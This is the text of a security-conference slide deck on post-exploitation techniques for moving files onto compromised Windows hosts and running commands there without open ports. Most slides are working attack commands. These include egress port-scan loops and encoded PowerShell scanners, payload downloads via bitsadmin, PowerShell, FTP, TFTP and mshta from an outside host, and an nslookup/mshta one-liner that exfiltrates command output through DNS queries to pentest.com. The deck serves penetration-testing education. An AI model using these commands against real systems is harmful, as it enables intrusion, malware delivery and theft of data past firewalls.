This document discusses various techniques for uploading files and executing commands on Windows systems without requiring any open TCP or UDP ports. It begins by covering built-in Windows utilities like FTP, TFTP, Telnet and NSLookup that can be used for this purpose. It then explores using PowerShell, JScript/VBScript, Windows Script Files and the Microsoft HTML Application (MSHTA) to execute commands and upload files over various protocols. The document demonstrates how these techniques can be used to conduct port scans and send files/commands via DNS records. It concludes with comparisons of using WebDAV versus Samba for file uploading and command execution.

1. Windows File Uploading Out
of the Box
[post exploitation]
Vyacheslav Yegoshin
Positive Technologies
PHDAYS III

2. [whoami]
http://github.com/nxnrt/WindowsUploadToolkit
Vyacheslav Yegoshin
- Penetration tester
- SCADAStrangeLove team member

5. [Problem]

6. [OSes] .NET 3.5 Integrated/UAC/etc.

7. [Utilities and tools]
― FTP
― TFTP
― Telnet
― JScript/VBScript
― Windows Script File
― MSHTA
― Samba
― WebDAV
― PowerShell
― BITSADMIN
― NSLOOKUP
― …

8. [Egress Firewall Test]
- Check all TCP ports
- Check all UDP ports

9. [Egress Firewall][Windows XP & 2003]
- Bruteforce all TCP ports on Pentest with telnet
FOR /L %i IN (1,1,65535) DO (cmd /c "start /b telnet 1.2.3.4 %i"

10. [Egress Firewall][Windows XP & 2003]
- Bruteforce all TCP ports on Pentest with telnet
- Bruteforce all UDP ports on Pentest with nslookup
FOR /L %i IN (1,1,4096) DO (cmd /c "start /b telnet 1.2.3.4 %i")
FOR /L %i IN (1,1,4096) DO (cmd /c "start /b nslookup -port=%i ya.ru 1.2.3.4")

11. [Egress Firewall][Incoming connection]
- Capture your traffic with TCPdump!
tcpdump –n 5.5.5.5

12. [Egress Firewall][Windows XP & 2003]
Influence:
~ 400 telnet.exe processes
~ 700 MB RAM is used
~ 30 min TCP scan
~ 30 min UDP scan

13. dism /online /enable-feature /featurename:TelnetClient
[Egress TCP][Windows Vista and Later]
- Bruteforce all TCP ports on Pentest with PowerShell
- Telnet client is Disabled by design :( but if we can it run with
elevated permissions …

14. powershell –encodedCommand
ZnVuY3Rpb24gc1QoJElQLCRQb3J0KSB7JEFkZHJlc3MgPSBbc3lzdGVtLm5ldC5JUEFkZHJlc3NdOjpQYXJzZSgkSVApOyRFbmQgPS
BOZXctT2JqZWN0IFN5c3RlbS5OZXQuSVBFbmRQb2ludCAkYWRkcmVzcywgJHBvcnQ7JFNhZGRyZiA9IFtTeXN0ZW0uTmV0LlNvY2t
ldHMuQWRkcmVzc0ZhbWlseV06OkludGVyTmV0d29yazskU3R5cGUgPSBbU3lzdGVtLk5ldC5Tb2NrZXRzLlNvY2tldFR5cGVdOjpTdHJl
YW07JFB0eXBlID0gW1N5c3RlbS5OZXQuU29ja2V0cy5Qcm90b2NvbFR5cGVdOjpUQ1A7JFNvY2sgPSBOZXctT2JqZWN0IFN5c3RlbS
5OZXQuU29ja2V0cy5Tb2NrZXQgJHNhZGRyZiwgJHN0eXBlLCAkcHR5cGU7JFNvY2suVFRMID0gMjY7dHJ5IHsgJHNvY2suQ29ubmVj
dCgkRW5kKTtbQnl0ZVtdXSAkTWVzc2FnZSA9IFtjaGFyW11dIncwMHR3MDB0IjskU2VudCA9ICRTb2NrLlNlbmQoJE1lc3NhZ2UpOyRz
b2NrLkVuZENvbm5lY3QoJENvbm5lY3QpfSBjYXRjaCB7fTskU29jay5DbG9zZSgpO307MS4uNjU1MzUgfCAleyBzVCAtSVAgIjEuMi4zLj
QiIC1Qb3J0ICRfIH0=
[Egress TCP][Windows Vista and Later]
- Bruteforce all TCP ports on Pentest with PowerShell

15. [Egress TCP][Windows Vista and Later]
function sT($IP,$Port) {
$Address = [system.net.IPAddress]::Parse($IP)
$End = New-Object System.Net.IPEndPoint $address, $port
$Saddrf = [System.Net.Sockets.AddressFamily]::InterNetwork
$Stype = [System.Net.Sockets.SocketType]::Stream
$Ptype = [System.Net.Sockets.ProtocolType]::TCP
$Sock = New-Object System.Net.Sockets.Socket $saddrf, $stype, $ptype
$Sock.TTL = 26
try {
$sock.Connect($End)
[Byte[]] $Message = [char[]]"w00tw00t“
$Sent = $Sock.Send($Message)
$sock.EndConnect($Connect)} catch {}
$Sock.Close()
}
1..65535 | %{ sT -IP "1.2.3.4" -Port $_ };
Base64 decode

16. [Egress UDP][Windows Vista and Later]
- Bruteforce all UDP ports on Pentest with PowerShell
- nslookup “set port” option doesn‟t work! :(
powershell –encodedCommand
ZnVuY3Rpb24gc1UoJElQLCBbaW50XSRQb3J0KXskQWRkcmVzcyA9IFtzeXN0ZW0ubmV0LklQQWRkcmVzc106OlBhcnNlKCRJUCk7JEVuZCA9IE5l
dy1PYmplY3QgU3lzdGVtLk5ldC5JUEVuZFBvaW50KCRBZGRyZXNzLCAkcG9ydCk7JFNhZGRyZj1bU3lzdGVtLk5ldC5Tb2NrZXRzLkFkZHJlc3NGYW
1pbHldOjpJbnRlck5ldHdvcms7JFN0eXBlPVtTeXN0ZW0uTmV0LlNvY2tldHMuU29ja2V0VHlwZV06OkRncmFtOyRQdHlwZT1bU3lzdGVtLk5ldC5Tb2Nr
ZXRzLlByb3RvY29sVHlwZV06OlVEUDskU29jaz1OZXctT2JqZWN0IFN5c3RlbS5OZXQuU29ja2V0cy5Tb2NrZXQgJHNhZGRyZiwgJHN0eXBlLCAkcH
R5cGU7JFNvY2suVFRMID0gMjY7JHNvY2suQ29ubmVjdCgkZW5kKTskRW5jPVtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OkFTQ0lJOyRNZXNzYWdlI
D0gIncwMHR3MDB0IjskQnVmZmVyPSRFbmMuR2V0Qnl0ZXMoJE1lc3NhZ2UpOyRTZW50PSRTb2NrLlNlbmQoJEJ1ZmZlcik7fTsgMS4uNjU1MzUgf
CAleyBzVSAtSVAgIjEuMi4zLjQiIC1Qb3J0ICRfIH0=

17. [Egress UDP][Windows Vista and Later]
Base64 decode
function sU($IP, [int]$Port){
$Address = [system.net.IPAddress]::Parse($IP)
$End = New-Object System.Net.IPEndPoint($Address, $port)
$Saddrf = [System.Net.Sockets.AddressFamily]::InterNetwork
$Stype = [System.Net.Sockets.SocketType]::Dgram
$Ptype = [System.Net.Sockets.ProtocolType]::UDP
$Sock = New-Object System.Net.Sockets.Socket $saddrf, $stype, $ptype
$Sock.TTL = 26
$sock.Connect($end)
$Enc = [System.Text.Encoding]::ASCII
$Message = "w00tw00t“
$Buffer = $Enc.GetBytes($Message)
$Sent = $Sock.Send($Buffer)
}
1..65535 | %{ sU -IP "1.2.3.4" -Port $_ }

18. [Egress TCP&UDP][Windows Vista and Later]
Minor Influence:
- 1 powershell.exe process
~ 100 MB RAM is used
~ 40 min TCP scan
~ 40 min UDP scan

19. [Telnet]
mode CON COLS=2000 && telnet -f c:payload.vbs 1.2.3.4 53
Max line length Path to save
nc -q 20 -lvp 53 < payload.vbs
Any TCP open

20. [Telnet] Only ASCII symbols: HEX is our choice!

21. [FTP]
Any TCP open
- Script file must exist
- FTP client built in all Windows versions

22. [FTP]
Create script file payload.txt:
open 1.2.3.4 3128
quote pasv
binary
get payload.exe c:payload.exe
bye service start pure-ftpd
Any TCP open
ftp –i–s:payload.txt

23. [TFTP]
69/UDP open
dism /online /enable-feature /featurename:TFTP
- Use only UDP protocol
- TFTP client is Disabled by design :( but if we can run it with
elevated permissions …

24. [TFTP]
69/UDP open
tftp –i 1.2.3.4 GET payload.exe
atftpd --daemon --port 69 /tmp

25. [Samba]
445/TCP open
+ No writable directory
+ No command output
- Proxy isn‟t supported
- 445/tcp only

26. [Samba]
net use X: 1.2.3.4
445/TCP open
start x:payload.exe
service smbd start

27. [JScript/VBScript]
Any TCP open
― Encode EXE to script
― Use protocols: SMTP, FTP, LDAP …
― Script file must exist: .js, .jse, .vbs, .vse
― JScript vs VBScript
― cscript vs wscript

28. [JScript/VBScript]
telnet –f payload.js 1.2.3.4 53
Any TCP open
nc -q 20 -lvp 53 < payload.js
cscript payload.js

29. [JScript/VBScript]
telnet –f payload.js 1.2.3.4 53 & cscript payload.js
Why not?
Press any key

30. [JScript/VBScript]
cscript 1.2.3.4payload.js
Any TCP open
service smbd start

31. [Windows Script File]
― XML document
― Script file must exist: .wsf, .wse
― JScript and VBScript
― External scripts
― Encode EXE to WSF

32. [Windows Script File][Link external script]
cscript payload.wsf
Any TCP open
<job><script language="VBScript" src="http://1.2.3.4:80/payload.vbs"></script></job>
<job><script language="VBScript" src=“ftp://1.2.3.4:21/payload.vbs"></script></job>
<job><script language="VBScript" src=“1.2.3.4payload.vbs"></script></job>

33. [Windows Script File]
― Any2Bat (zzzEVAzzz)
p.exe Make p.cab
<package>
<cab xmlns:dt="urn:schemas-microsoft-com:datatypes"
dt:dt="bin.base64">
</cab>
<job><script language=„VBScript‟>
…
</script></job></package>
Read p.cab and Base64
encode
Convert to BAT: echo … >> payload.wsf
Insert
here

34. [Windows Script File]
― Any2Bat. Now in PowerShell!
• Make-CabFile –Path
• Convert-Cab2Base64 –CabPath
• Convert-Cab2WSF –CabEncode
• Convert-Cab2Bat -CabEncode
Make-CabFile –Path c:payload.exe | Convert-Cab2WSF
Make-CabFile –Path c:payload.exe | Convert-Cab2Bat

35. [Windows Script File]
DEMO

36. [MSHTA]
― No browser security zones
― Argument: URL or Script
• JScript
• VBScript
― No UAC
― Parse text on the fly

37. [MSHTA]
mshta http(s)://pastebin.com:80/raw.php?i=5W6JtsUu
mshta ftp://1.2.3.4:21/payload.jpg
mshta 1.2.3.4payload.js
Any TCP open

38. [MSHTA]
mshta vbscript:Execute("WScript.Echo 1")
mshta javascript:Execute("WScript.Echo(1);")
Any TCP open

39. [NSLOOKUP]
no tcp/udp open
― Get DNS Records:
• IP -> Domain name (PTR)
• Domain name -> IP (A and AAAA)
• Get TXT record (TXT)

40. [NSLOOKUP]
TARGET
IP: 192.168.1.10
Firewall/NAT
Internal IP: 192.168.1.1
External IP: 5.5.5.5
PENTEST
IP: 1.2.3.4
Remote Command Execution
Name server:
pentest.comInternal primary DNS
Response
no tcp/udp open
Get all TXT records from
rce.pentest.com

41. [NSLOOKUP][Get file]
TXT = 1x“ & echo dir ”c:Program Files” >> p.bat & ”
Name server:
rce.pentest.com
TARGET
IP: 192.168.1.10
nslookup –type=TXT rce.pentest.com > run.bat &
run.bat

42. [NSLOOKUP][Get file]
TARGET
IP: 192.168.1.10
Source p.bat
Valid command

43. [NSLOOKUP][Send]
Name server:
rce.pentest.com
TARGET
IP: 192.168.1.10
PoC: FOR /F %I IN ('ipconfig /all') DO nslookup
%I.rce.pentest.com
DNS server logging

44. [NSLOOKUP][Send]
mshta "javascript:function
h(out){hxd='';for(a=0;a<out.length;a=a+1){hxd=hxd+out.charCod
eAt(a).toString(16);}return hxd;}function r(cmd){var
shell=new ActiveXObject('WScript.Shell');var
se=shell.Exec(cmd);var out =
'';while(!(se.StdOut.AtEndOfStream)){out=out+se.StdOut.ReadLi
ne();}return out;}function ex(cmd){var
out=h(r(cmd));query=out.match(/.{1,60}/g);for(v=0;v<query.len
gth;v=v+1){r('nslookup
'+v+'x'+query[v]+'.pentest.com')};}function
e(){ex('dir');}window.onload=e"

45. [NSLOOKUP][Send]
Read command STDOUT
Example command: dir
Convert to HEX
.match(/.{1,60}/g);j,valj + ”x” + val + “.pentest.com”
nslookup 0x417070446174614170706c69636174696f6e5c2044617461436f6e746163.pentest.com
nslookup 1x7473436f6f6b6965734465736b746f70446f63756d656e7473446f776e6c.pentest.com
nslookup 2x6f61647344726f70626f784661766f72697465734c696e6b734c6f63616c.pentest.com

46. use auxiliary/server/fakedns
[NSLOOKUP][Send]
no tcp/udp open
where powershell

47. [NSLOOKUP][Send file]
DEMO

48. [WebDAV] [Samba]
Any TCP open
+ No writable directory
+ No command output
+ Proxy
+ Any tcp open
+ SSL
+ No writable directory
+ No command output
- Proxy doesn‟t supported
- 445/tcp only
vs.
Any TCP open

49. [WebDAV][Windows XP SP3 or KB892211]
Any TCP open
net use X:
http(s)://1.2.3.4/webdav
1.2.3.4webdav
1.2.3.4@SSLwebdav
1.2.3.4@SSL@5443webdav
1.2.3.4@53webdav
Apache WebDAV module
Any TCP open

50. [PowerShell]
Any TCP open
― C# code
― Any application level protocol
― Encoded commands
― Simple and it‟s work!
Any TCP open

51. [PowerShell]
Any TCP open
(New-Object
System.Net.WebClient).DownloadFile("http://1.2.3.4:80/payload.exe", "c:payload.exe")
service apache2 start
Any TCP open

52. [BITSADMIN][Windows 2003 SP1 and later]
Any TCP open
bitsadmin /transfer whatever http://1.2.3.4:80/payload.exe
c:payload.exe
service apache2 start
Any TCP open

53. [BITSADMIN][Windows 2003 SP1 and later]
Any TCP open
bitsadmin /CREATE /DOWNLOAD jobname
bitsadmin /ADDFILE jobname http://1.2.3.4/payload1.exe p1.exe
bitsadmin /ADDFILE jobname http://1.2.3.4/payload2.exe p2.exe
…
bitsadmin /RESUME jobname
bitsadmin /COMPLETE jobname
Any TCP open

54. [Special tnx]
—Gleb Gritsai
—Sergey Gordeychik

55. Questions?
http://github.com/nxnrt/WindowsUploadToolkit
@vegoshin
vegoshin@ptsecurity.com